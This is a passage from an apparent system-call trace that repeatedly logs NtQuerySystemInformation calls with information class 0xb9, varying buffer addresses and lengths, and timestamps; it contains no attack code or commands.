NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.158] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.158] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd730, Length=0x28, ResultLength=0x0) [0274.158] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.158] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.158] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd730, Length=0x28, ResultLength=0x0) [0274.158] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.158] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.158] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd730, Length=0x28, ResultLength=0x0) [0274.158] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.158] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.158] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd7a0, Length=0x28, ResultLength=0x0) [0274.159] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.159] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.159] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd900, Length=0x38, ResultLength=0x0) [0274.159] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.159] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd820, Length=0x28, ResultLength=0x0) [0274.161] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.161] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.161] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.161] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.161] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.161] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd820, Length=0x28, ResultLength=0x0) [0274.161] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.161] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.161] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd900, Length=0x38, ResultLength=0x0) [0274.162] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd780, Length=0x20, ResultLength=0x0) [0274.162] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd700, Length=0x20, ResultLength=0x0) [0274.162] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.162] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd700, Length=0x20, ResultLength=0x0) [0274.162] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.162] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd700, Length=0x20, ResultLength=0x0) [0274.162] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.162] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.162] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.162] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.162] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd900, Length=0x38, ResultLength=0x0) [0274.162] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd780, Length=0x20, ResultLength=0x0) [0274.162] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd710, Length=0x20, ResultLength=0x0) [0274.162] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.162] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.162] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.162] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd710, Length=0x20, ResultLength=0x0) [0274.162] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.163] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.163] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.163] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.163] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.163] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd9e0, Length=0x58, ResultLength=0x0) [0274.163] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.163] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd900, Length=0x38, ResultLength=0x0) [0274.165] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.165] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd730, Length=0x28, ResultLength=0x0) [0274.165] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.165] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.165] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd730, Length=0x28, ResultLength=0x0) [0274.165] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.165] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.165] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd730, Length=0x28, ResultLength=0x0) [0274.165] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.166] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.166] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd730, Length=0x28, ResultLength=0x0) [0274.166] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.166] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.166] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd7a0, Length=0x28, ResultLength=0x0) [0274.166] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.166] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.166] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd900, Length=0x38, ResultLength=0x0) [0274.166] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.166] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd820, Length=0x28, ResultLength=0x0) [0274.169] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.169] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.169] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.169] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.169] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.169] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd820, Length=0x28, ResultLength=0x0) [0274.169] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd6c0, Length=0x20, ResultLength=0x0) [0274.169] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd640, Length=0x20, ResultLength=0x0) [0274.169] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.169] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd640, Length=0x20, ResultLength=0x0) [0274.169] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.169] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd640, Length=0x20, ResultLength=0x0) [0274.169] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.169] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.170] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.170] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.170] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.170] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd900, Length=0x38, ResultLength=0x0) [0274.170] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.170] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd900, Length=0x38, ResultLength=0x0) [0274.170] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd780, Length=0x20, ResultLength=0x0) [0274.170] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd710, Length=0x20, ResultLength=0x0) [0274.170] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.170] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.170] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.170] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd710, Length=0x20, ResultLength=0x0) [0274.170] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.170] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.170] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.170] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.170] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.170] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd9e0, Length=0x58, ResultLength=0x0) [0274.171] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.171] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd900, Length=0x38, ResultLength=0x0) [0274.172] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.173] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd730, Length=0x28, ResultLength=0x0) [0274.173] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.173] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.173] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd730, Length=0x28, ResultLength=0x0) [0274.173] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.173] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.173] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd730, Length=0x28, ResultLength=0x0) [0274.173] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.173] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.173] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd730, Length=0x28, ResultLength=0x0) [0274.173] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.173] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.173] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd7a0, Length=0x28, ResultLength=0x0) [0274.173] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.173] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.173] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd900, Length=0x38, ResultLength=0x0) [0274.173] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.174] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd820, Length=0x28, ResultLength=0x0) [0274.176] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.176] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.176] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.177] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.177] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.177] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd820, Length=0x28, ResultLength=0x0) [0274.177] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.177] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.177] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd900, Length=0x38, ResultLength=0x0) [0274.177] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd780, Length=0x20, ResultLength=0x0) [0274.177] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd700, Length=0x20, ResultLength=0x0) [0274.177] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.177] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd700, Length=0x20, ResultLength=0x0) [0274.177] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.177] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd700, Length=0x20, ResultLength=0x0) [0274.177] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.178] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.178] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.178] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.178] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd900, Length=0x38, ResultLength=0x0) [0274.178] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd780, Length=0x20, ResultLength=0x0) [0274.178] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd710, Length=0x20, ResultLength=0x0) [0274.178] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.178] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.178] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.178] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd710, Length=0x20, ResultLength=0x0) [0274.178] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.178] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.178] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.178] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.178] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.178] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd9e0, Length=0x58, ResultLength=0x0) [0274.179] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.179] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd8c0, Length=0x38, ResultLength=0x0) [0274.181] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.181] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.183] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.183] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.183] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd700, Length=0x28, ResultLength=0x0) [0274.183] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.183] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.183] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd700, Length=0x28, ResultLength=0x0) [0274.183] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.183] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.184] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd700, Length=0x28, ResultLength=0x0) [0274.184] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.184] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.184] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd700, Length=0x28, ResultLength=0x0) [0274.184] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.184] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.184] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd770, Length=0x28, ResultLength=0x0) [0274.184] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.184] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.184] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd8c0, Length=0x38, ResultLength=0x0) [0274.184] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.184] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd8c0, Length=0x38, ResultLength=0x0) [0274.184] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.184] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd7f0, Length=0x28, ResultLength=0x0) [0274.186] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.186] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.186] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.187] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.187] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.187] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd7f0, Length=0x28, ResultLength=0x0) [0274.187] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.187] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.187] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd8c0, Length=0x38, ResultLength=0x0) [0274.187] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.187] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd8c0, Length=0x38, ResultLength=0x0) [0274.187] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.187] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.187] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.187] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.188] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.188] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd660, Length=0x20, ResultLength=0x0) [0274.188] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd5e0, Length=0x20, ResultLength=0x0) [0274.188] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.188] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd5e0, Length=0x20, ResultLength=0x0) [0274.188] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.188] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd5e0, Length=0x20, ResultLength=0x0) [0274.188] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.188] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.188] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.188] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd830, Length=0x20, ResultLength=0x0) [0274.188] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.188] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.188] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd8c0, Length=0x38, ResultLength=0x0) [0274.188] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd750, Length=0x20, ResultLength=0x0) [0274.188] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd6d0, Length=0x20, ResultLength=0x0) [0274.188] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.188] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd6d0, Length=0x20, ResultLength=0x0) [0274.188] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.188] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd6d0, Length=0x20, ResultLength=0x0) [0274.189] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.189] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.189] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.189] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.189] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd8c0, Length=0x38, ResultLength=0x0) [0274.189] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd750, Length=0x20, ResultLength=0x0) [0274.189] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd6d0, Length=0x20, ResultLength=0x0) [0274.189] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.189] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd6d0, Length=0x20, ResultLength=0x0) [0274.189] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.189] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd6d0, Length=0x20, ResultLength=0x0) [0274.189] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.189] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.189] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.189] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.189] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd8c0, Length=0x38, ResultLength=0x0) [0274.189] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd750, Length=0x20, ResultLength=0x0) [0274.189] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd6e0, Length=0x20, ResultLength=0x0) [0274.190] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.190] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.190] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.190] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd6e0, Length=0x20, ResultLength=0x0) [0274.190] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.190] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.190] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.190] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, 